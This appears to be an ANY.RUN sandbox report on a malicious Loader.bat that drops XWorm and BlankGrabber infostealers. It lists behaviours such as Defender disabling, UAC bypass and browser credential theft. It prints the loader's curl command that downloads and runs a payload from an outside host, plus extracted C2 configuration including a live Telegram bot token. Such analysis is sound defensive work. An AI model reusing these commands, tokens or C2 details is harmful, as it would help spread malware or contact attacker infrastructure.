File name:

Loader.bat

Full analysis: https://app.any.run/tasks/2ead00e1-4b40-497e-ae53-ea5999701928
Verdict: Malicious activity
Threats:

Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is an open-source malware, with its code available on GitHub and regularly receiving updates. Blank Grabber builder’s simple interface lets threat actors even with basic skills to deploy it and conduct attacks.

Analysis date: December 14, 2024, 09:01:02
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
evasion
pastebin
xworm
telegram
blankgrabber
uac
stealer
screenshot
crypto-regex
ims-api
generic
susp-powershell
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with CRLF line terminators
MD5:

FB1ED106573FCA31E50C6BD978829375

SHA1:

50F3AB1B707F266BEC104AA341D536972CEA9ED6

SHA256:

688BCA22FE774BD3C0327A544B945DDD99EBCA771797B00F03FBE276E0A9A512

SSDEEP:

24:XXeDkcxfKB2kW41QW/bnXj0cLc9/Si2kWM/QWunz5KDlJFfn:XuDc2f4BjXIum2fMruz5K5jn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the autorun value in the registry

      • lJA.exe (PID: 6368)
    • Uses Task Scheduler to run other applications

      • lJA.exe (PID: 6368)
    • XWORM has been detected

      • lJA.exe (PID: 6368)
    • Create files in the Startup directory

      • lJA.exe (PID: 6368)
      • lJL.exe (PID: 6380)
      • lJL.exe (PID: 7360)
    • Executing a file with an untrusted certificate

      • lJL.exe (PID: 828)
      • lJL.exe (PID: 6292)
      • lJL.exe (PID: 6560)
      • lJL.exe (PID: 6380)
      • lJL.exe (PID: 8160)
      • lJL.exe (PID: 6292)
      • lJL.exe (PID: 6716)
      • lJL.exe (PID: 7360)
    • BlankGrabber has been detected

      • lJL.exe (PID: 828)
      • lJL.exe (PID: 6560)
      • lJL.exe (PID: 8160)
      • lJL.exe (PID: 6716)
    • Bypass User Account Control (ComputerDefaults)

      • ComputerDefaults.exe (PID: 6096)
      • ComputerDefaults.exe (PID: 2800)
    • Bypass User Account Control (Modify registry)

      • reg.exe (PID: 2600)
      • reg.exe (PID: 6028)
    • Antivirus name has been found in the command line (generic signature)

      • cmd.exe (PID: 6176)
      • MpCmdRun.exe (PID: 5788)
      • cmd.exe (PID: 7660)
      • MpCmdRun.exe (PID: 6032)
    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 4932)
      • powershell.exe (PID: 768)
    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 4932)
      • powershell.exe (PID: 768)
    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 1904)
      • lJL.exe (PID: 6380)
      • cmd.exe (PID: 2972)
      • lJL.exe (PID: 7360)
      • cmd.exe (PID: 7504)
      • cmd.exe (PID: 7368)
    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 4932)
      • powershell.exe (PID: 768)
    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 4932)
      • powershell.exe (PID: 768)
    • Changes settings for real-time protection

      • powershell.exe (PID: 4932)
      • powershell.exe (PID: 768)
    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 4932)
      • powershell.exe (PID: 768)
    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 4932)
      • powershell.exe (PID: 768)
    • Steals credentials from Web Browsers

      • lJL.exe (PID: 6380)
      • lJL.exe (PID: 7360)
    • Actions looks like stealing of personal data

      • lJL.exe (PID: 6380)
      • lJL.exe (PID: 7360)
    • XWORM has been detected (YARA)

      • lJA.exe (PID: 6368)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 7188)
      • cmd.exe (PID: 7052)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7444)
      • powershell.exe (PID: 4516)
    • Resets Windows Defender malware definitions to the base version

      • MpCmdRun.exe (PID: 5788)
      • MpCmdRun.exe (PID: 6032)
    • BLANKGRABBER has been detected (SURICATA)

      • lJL.exe (PID: 6380)
      • lJL.exe (PID: 7360)
    • Starts CMD.EXE for self-deleting

      • lJL.exe (PID: 6380)
      • lJL.exe (PID: 7360)
  • SUSPICIOUS

    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 6232)
      • cmd.exe (PID: 8132)
    • Executable content was dropped or overwritten

      • curl.exe (PID: 6292)
      • lJA.exe (PID: 6368)
      • lJL.exe (PID: 828)
      • lJL.exe (PID: 6560)
      • lJL.exe (PID: 6380)
      • csc.exe (PID: 6760)
      • lJL.exe (PID: 8160)
      • lJL.exe (PID: 6716)
      • lJL.exe (PID: 7360)
      • csc.exe (PID: 5912)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 6232)
      • cmd.exe (PID: 828)
      • cmd.exe (PID: 8132)
      • cmd.exe (PID: 5972)
    • Checks for external IP

      • lJA.exe (PID: 6368)
      • svchost.exe (PID: 2192)
      • lJL.exe (PID: 6380)
      • lJL.exe (PID: 7360)
    • Reads the date of Windows installation

      • lJA.exe (PID: 6368)
    • The process creates files with name similar to system file names

      • lJA.exe (PID: 6368)
    • Reads security settings of Internet Explorer

      • lJA.exe (PID: 6368)
    • The process drops C-runtime libraries

      • lJL.exe (PID: 828)
      • lJL.exe (PID: 6560)
      • lJL.exe (PID: 8160)
      • lJL.exe (PID: 6716)
    • Process drops legitimate windows executable

      • lJL.exe (PID: 828)
      • lJL.exe (PID: 6560)
      • lJL.exe (PID: 6380)
      • lJL.exe (PID: 8160)
      • lJL.exe (PID: 6716)
      • lJL.exe (PID: 7360)
    • Starts a Microsoft application from unusual location

      • lJL.exe (PID: 828)
      • lJL.exe (PID: 6292)
      • lJL.exe (PID: 6560)
      • lJL.exe (PID: 6380)
      • lJL.exe (PID: 8160)
      • lJL.exe (PID: 6292)
      • lJL.exe (PID: 6716)
      • lJL.exe (PID: 7360)
    • Process drops python dynamic module

      • lJL.exe (PID: 828)
      • lJL.exe (PID: 6560)
      • lJL.exe (PID: 8160)
      • lJL.exe (PID: 6716)
    • Application launched itself

      • lJL.exe (PID: 828)
      • lJL.exe (PID: 6560)
      • lJL.exe (PID: 8160)
      • lJL.exe (PID: 6716)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • lJA.exe (PID: 6368)
      • lJL.exe (PID: 6380)
      • lJL.exe (PID: 7360)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 4944)
      • cmd.exe (PID: 4932)
      • cmd.exe (PID: 7104)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 1804)
      • cmd.exe (PID: 7096)
    • Changes default file association

      • reg.exe (PID: 2600)
      • reg.exe (PID: 6028)
    • Starts CMD.EXE for commands execution

      • lJL.exe (PID: 6292)
      • lJL.exe (PID: 6380)
      • lJL.exe (PID: 6292)
      • lJL.exe (PID: 7360)
    • Found strings related to reading or modifying Windows Defender settings

      • lJL.exe (PID: 6292)
      • lJL.exe (PID: 6380)
      • lJL.exe (PID: 6292)
      • lJL.exe (PID: 7360)
    • Uses WEVTUTIL.EXE to query events from a log or log file

      • cmd.exe (PID: 4516)
      • cmd.exe (PID: 6956)
      • cmd.exe (PID: 1296)
      • cmd.exe (PID: 3928)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1904)
      • cmd.exe (PID: 6176)
      • cmd.exe (PID: 2972)
      • cmd.exe (PID: 6296)
      • cmd.exe (PID: 7188)
      • cmd.exe (PID: 7632)
      • cmd.exe (PID: 7832)
      • cmd.exe (PID: 3688)
      • cmd.exe (PID: 732)
      • cmd.exe (PID: 7504)
      • cmd.exe (PID: 7660)
      • cmd.exe (PID: 7368)
      • cmd.exe (PID: 488)
      • cmd.exe (PID: 7052)
      • cmd.exe (PID: 6392)
      • cmd.exe (PID: 1192)
      • cmd.exe (PID: 1228)
      • cmd.exe (PID: 6920)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 1904)
      • cmd.exe (PID: 2972)
      • cmd.exe (PID: 7504)
      • cmd.exe (PID: 7368)
    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 6176)
      • cmd.exe (PID: 7660)
    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 6176)
      • cmd.exe (PID: 7660)
    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 2728)
      • cmd.exe (PID: 4520)
      • cmd.exe (PID: 5736)
      • cmd.exe (PID: 4764)
      • cmd.exe (PID: 6092)
      • cmd.exe (PID: 6324)
    • Get information on the list of running processes

      • cmd.exe (PID: 6168)
      • cmd.exe (PID: 1760)
      • cmd.exe (PID: 3544)
      • lJL.exe (PID: 6380)
      • cmd.exe (PID: 7096)
      • cmd.exe (PID: 7204)
      • lJL.exe (PID: 7360)
      • cmd.exe (PID: 4932)
      • cmd.exe (PID: 6540)
      • cmd.exe (PID: 6912)
    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 7100)
      • cmd.exe (PID: 4640)
      • cmd.exe (PID: 628)
      • cmd.exe (PID: 1488)
      • cmd.exe (PID: 4912)
      • cmd.exe (PID: 5244)
    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 1804)
      • WMIC.exe (PID: 5588)
      • WMIC.exe (PID: 7868)
      • WMIC.exe (PID: 6512)
    • Accesses video controller name via WMI (SCRIPT)

      • WMIC.exe (PID: 7132)
      • WMIC.exe (PID: 6880)
      • WMIC.exe (PID: 3732)
      • WMIC.exe (PID: 7148)
      • WMIC.exe (PID: 3840)
      • WMIC.exe (PID: 7536)
    • Starts application with an unusual extension

      • cmd.exe (PID: 540)
      • cmd.exe (PID: 7368)
      • cmd.exe (PID: 7676)
      • cmd.exe (PID: 7788)
      • cmd.exe (PID: 8080)
      • cmd.exe (PID: 7936)
      • cmd.exe (PID: 4520)
      • cmd.exe (PID: 4444)
      • cmd.exe (PID: 8064)
      • cmd.exe (PID: 5836)
      • cmd.exe (PID: 6888)
      • cmd.exe (PID: 7548)
    • Connects to unusual port

      • lJA.exe (PID: 6368)
    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 2624)
      • cmd.exe (PID: 4580)
    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 6348)
      • cmd.exe (PID: 3060)
    • Found regular expressions for crypto-addresses (YARA)

      • lJA.exe (PID: 6368)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 7188)
      • cmd.exe (PID: 7052)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • lJA.exe (PID: 6368)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 7188)
      • cmd.exe (PID: 7052)
    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 7188)
      • cmd.exe (PID: 7052)
    • Accesses antivirus product name via WMI (SCRIPT)

      • WMIC.exe (PID: 7176)
      • WMIC.exe (PID: 8124)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 6760)
      • csc.exe (PID: 5912)
    • Uses WMIC.EXE to obtain operating system information

      • cmd.exe (PID: 4264)
      • cmd.exe (PID: 7908)
    • The executable file from the user directory is run by the CMD process

      • rar.exe (PID: 7780)
      • rar.exe (PID: 6796)
    • Captures screenshot (POWERSHELL)

      • powershell.exe (PID: 7444)
      • powershell.exe (PID: 4516)
    • Accesses operating system name via WMI (SCRIPT)

      • WMIC.exe (PID: 5308)
      • WMIC.exe (PID: 7860)
    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 4944)
      • cmd.exe (PID: 7304)
    • Hides command output

      • cmd.exe (PID: 7356)
      • cmd.exe (PID: 4864)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 7356)
      • cmd.exe (PID: 4864)
    • The process executes via Task Scheduler

      • svchost.exe (PID: 7368)
      • svchost.exe (PID: 7092)
      • svchost.exe (PID: 7524)
      • svchost.exe (PID: 7552)
  • INFO

    • Reads the computer name

      • curl.exe (PID: 6292)
      • lJA.exe (PID: 6368)
      • curl.exe (PID: 7164)
      • lJL.exe (PID: 828)
      • lJL.exe (PID: 6560)
      • lJL.exe (PID: 6380)
      • MpCmdRun.exe (PID: 5788)
      • svchost.exe (PID: 7368)
      • svchost.exe (PID: 7092)
      • curl.exe (PID: 6148)
      • curl.exe (PID: 8064)
      • lJA.exe (PID: 7184)
      • lJL.exe (PID: 8160)
      • lJL.exe (PID: 6716)
      • lJL.exe (PID: 7360)
      • MpCmdRun.exe (PID: 6032)
      • svchost.exe (PID: 7524)
      • svchost.exe (PID: 7552)
    • Checks supported languages

      • lJA.exe (PID: 6368)
      • curl.exe (PID: 6292)
      • curl.exe (PID: 7164)
      • lJL.exe (PID: 828)
      • lJL.exe (PID: 6292)
      • lJL.exe (PID: 6560)
      • lJL.exe (PID: 6380)
      • tree.com (PID: 6160)
      • tree.com (PID: 7620)
      • tree.com (PID: 7748)
      • tree.com (PID: 8132)
      • tree.com (PID: 8028)
      • tree.com (PID: 7864)
      • csc.exe (PID: 6760)
      • MpCmdRun.exe (PID: 5788)
      • rar.exe (PID: 7780)
      • cvtres.exe (PID: 7272)
      • svchost.exe (PID: 7368)
      • svchost.exe (PID: 7092)
      • lJA.exe (PID: 7184)
      • curl.exe (PID: 6148)
      • curl.exe (PID: 8064)
      • lJL.exe (PID: 8160)
      • lJL.exe (PID: 6292)
      • lJL.exe (PID: 6716)
      • lJL.exe (PID: 7360)
      • tree.com (PID: 3172)
      • tree.com (PID: 5568)
      • tree.com (PID: 3544)
      • tree.com (PID: 5316)
      • tree.com (PID: 7248)
      • tree.com (PID: 6600)
      • csc.exe (PID: 5912)
      • MpCmdRun.exe (PID: 6032)
      • cvtres.exe (PID: 7440)
      • rar.exe (PID: 6796)
      • svchost.exe (PID: 7552)
      • svchost.exe (PID: 7524)
    • Execution of CURL command

      • cmd.exe (PID: 6232)
      • cmd.exe (PID: 8132)
    • Reads the machine GUID from the registry

      • lJA.exe (PID: 6368)
      • csc.exe (PID: 6760)
      • rar.exe (PID: 7780)
      • svchost.exe (PID: 7368)
      • svchost.exe (PID: 7092)
      • lJA.exe (PID: 7184)
      • csc.exe (PID: 5912)
      • rar.exe (PID: 6796)
      • svchost.exe (PID: 7524)
      • svchost.exe (PID: 7552)
    • Disables trace logs

      • lJA.exe (PID: 6368)
    • Reads Environment values

      • lJA.exe (PID: 6368)
    • Checks proxy server information

      • lJA.exe (PID: 6368)
    • The process uses the downloaded file

      • lJA.exe (PID: 6368)
      • cmd.exe (PID: 624)
      • cmd.exe (PID: 7548)
    • Creates files in the program directory

      • lJA.exe (PID: 6368)
      • lJL.exe (PID: 6380)
      • lJL.exe (PID: 7360)
    • Process checks computer location settings

      • lJA.exe (PID: 6368)
    • Reads the software policy settings

      • lJA.exe (PID: 6368)
    • Creates files or folders in the user directory

      • lJA.exe (PID: 6368)
    • Create files in a temporary directory

      • lJL.exe (PID: 6292)
      • lJL.exe (PID: 828)
      • lJL.exe (PID: 6560)
      • lJL.exe (PID: 6380)
      • MpCmdRun.exe (PID: 5788)
      • csc.exe (PID: 6760)
      • cvtres.exe (PID: 7272)
      • rar.exe (PID: 7780)
      • lJA.exe (PID: 6368)
      • lJL.exe (PID: 6292)
      • lJL.exe (PID: 8160)
      • lJL.exe (PID: 6716)
      • lJL.exe (PID: 7360)
      • cvtres.exe (PID: 7440)
      • csc.exe (PID: 5912)
      • rar.exe (PID: 6796)
    • The sample compiled with english language support

      • lJL.exe (PID: 828)
      • lJL.exe (PID: 6560)
      • lJL.exe (PID: 6380)
      • lJL.exe (PID: 8160)
      • lJL.exe (PID: 6716)
      • lJL.exe (PID: 7360)
    • Reads security settings of Internet Explorer

      • ComputerDefaults.exe (PID: 6096)
      • WMIC.exe (PID: 1804)
      • WMIC.exe (PID: 6880)
      • WMIC.exe (PID: 7132)
      • WMIC.exe (PID: 7176)
      • WMIC.exe (PID: 5652)
      • WMIC.exe (PID: 5308)
      • WMIC.exe (PID: 5588)
      • WMIC.exe (PID: 3732)
      • ComputerDefaults.exe (PID: 2800)
      • WMIC.exe (PID: 7868)
      • WMIC.exe (PID: 7148)
      • WMIC.exe (PID: 3840)
      • WMIC.exe (PID: 8124)
      • WMIC.exe (PID: 7860)
      • WMIC.exe (PID: 6512)
      • WMIC.exe (PID: 4244)
      • WMIC.exe (PID: 7536)
    • Checks the directory tree

      • tree.com (PID: 6160)
      • tree.com (PID: 7748)
      • tree.com (PID: 7620)
      • tree.com (PID: 7864)
      • tree.com (PID: 8132)
      • tree.com (PID: 8028)
      • tree.com (PID: 3172)
      • tree.com (PID: 3544)
      • tree.com (PID: 5568)
      • tree.com (PID: 5316)
      • tree.com (PID: 7248)
      • tree.com (PID: 6600)
    • The Powershell gets current clipboard

      • powershell.exe (PID: 7300)
      • powershell.exe (PID: 7976)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5892)
      • powershell.exe (PID: 4932)
      • powershell.exe (PID: 5316)
      • powershell.exe (PID: 7948)
      • powershell.exe (PID: 7556)
      • powershell.exe (PID: 768)
      • powershell.exe (PID: 6084)
      • powershell.exe (PID: 6576)
      • powershell.exe (PID: 7404)
      • powershell.exe (PID: 1344)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4932)
      • powershell.exe (PID: 5316)
      • powershell.exe (PID: 5892)
      • powershell.exe (PID: 768)
      • powershell.exe (PID: 6084)
      • powershell.exe (PID: 6576)
    • Displays MAC addresses of computer network adapters

      • getmac.exe (PID: 7812)
      • getmac.exe (PID: 3984)
    • Manual execution by a user

      • cmd.exe (PID: 8132)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

XWorm

(PID) Process(6368) lJA.exe
C2https://pastebin.com/raw/7jqELnuS:<123456789>
Keys
AES<Xwormmm>
Options
Splitter3
Sleep timeexpen
USB drop nameUSB.exe
MutexELROkZcZRQ3mWnPc

ims-api

(PID) Process(6368) lJA.exe
Telegram-Tokens (1)7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
Telegram-Info-Links
7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
Get info about bothttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/getMe
Get incoming updateshttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/getUpdates
Get webhookhttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
End-PointsendMessage
Args
chat_id (1)6434827273
Token7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
End-PointsendMessage
Args
chat_id (1)6434827273
text (1)☠ [XWorm V5.2] New Clinet : 3C54740F7CC0F23B53E5 UserName : admin OSFullName : Microsoft Windows 10
Token7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
End-PointsendMessage
Args
chat_id (1)6434827273
text (1)☠ [XWorm V5.2] New Clinet : 3C54740F7CC0F23B53E5 UserName : admin OSFullName : Microsoft Windows 10 Pro USB : False CPU : Intel i5-6400 @ 2.70GHz GPU : Microsoft Basic Display Adapter RAM : 3.99 GB Groub : expen HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Telegram-Responses
oktrue
result
message_id587
from
id7559403648
is_bottrue
first_name[ Meow-Team ]
usernameqwq123qwdaff_bot
chat
id6434827273
first_name>.<
usernamerecafking
typeprivate
date1734166874
text☠ [XWorm V5.2] New Clinet : 3C54740F7CC0F23B53E5 UserName : admin OSFullName : Microsoft Windows 10 Pro USB : False CPU : Intel i5-6400 @ 2.70GHz GPU : Microsoft Basic Display Adapter RAM : 3.99 GB Groub : expen
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
427
Monitored processes
293
Malicious processes
25
Suspicious processes
16

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs curl.exe attrib.exe no specs #XWORM lja.exe timeout.exe no specs svchost.exe curl.exe schtasks.exe no specs conhost.exe no specs attrib.exe no specs #BLANKGRABBER ljl.exe timeout.exe no specs ljl.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs computerdefaults.exe no specs computerdefaults.exe no specs computerdefaults.exe #BLANKGRABBER ljl.exe cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs #BLANKGRABBER ljl.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs tasklist.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs timeout.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs attrib.exe no specs powershell.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs tasklist.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs conhost.exe no specs tree.com no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs netsh.exe no specs powershell.exe no specs systeminfo.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs powershell.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs tiworker.exe no specs csc.exe mpcmdrun.exe no specs cvtres.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs getmac.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs rar.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs svchost.exe no specs svchost.exe no specs cmd.exe no specs conhost.exe no specs curl.exe attrib.exe no specs lja.exe no specs timeout.exe no specs curl.exe attrib.exe no specs #BLANKGRABBER ljl.exe timeout.exe no specs ljl.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs computerdefaults.exe no specs computerdefaults.exe no specs computerdefaults.exe #BLANKGRABBER ljl.exe cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs #BLANKGRABBER ljl.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs powershell.exe no specs powershell.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs attrib.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs tasklist.exe no specs tasklist.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs tasklist.exe no specs wmic.exe no specs netsh.exe no specs tree.com no specs timeout.exe no specs systeminfo.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs mpcmdrun.exe no specs tiworker.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs getmac.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs rar.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs svchost.exe no specs svchost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
6232C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\Loader.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
6240\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6292curl -o lJA.exe https://envs.sh/lJA.exeC:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
6340attrib +h lJA.exeC:\Windows\System32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Attribute Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
6368lJA.exe C:\Users\admin\Desktop\lJA.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\lja.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
XWorm
(PID) Process(6368) lJA.exe
C2https://pastebin.com/raw/7jqELnuS:<123456789>
Keys
AES<Xwormmm>
Options
Splitter3
Sleep timeexpen
USB drop nameUSB.exe
MutexELROkZcZRQ3mWnPc
ims-api
(PID) Process(6368) lJA.exe
Telegram-Tokens (1)7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
Telegram-Info-Links
7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
Get info about bothttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/getMe
Get incoming updateshttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/getUpdates
Get webhookhttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/deleteWebhook
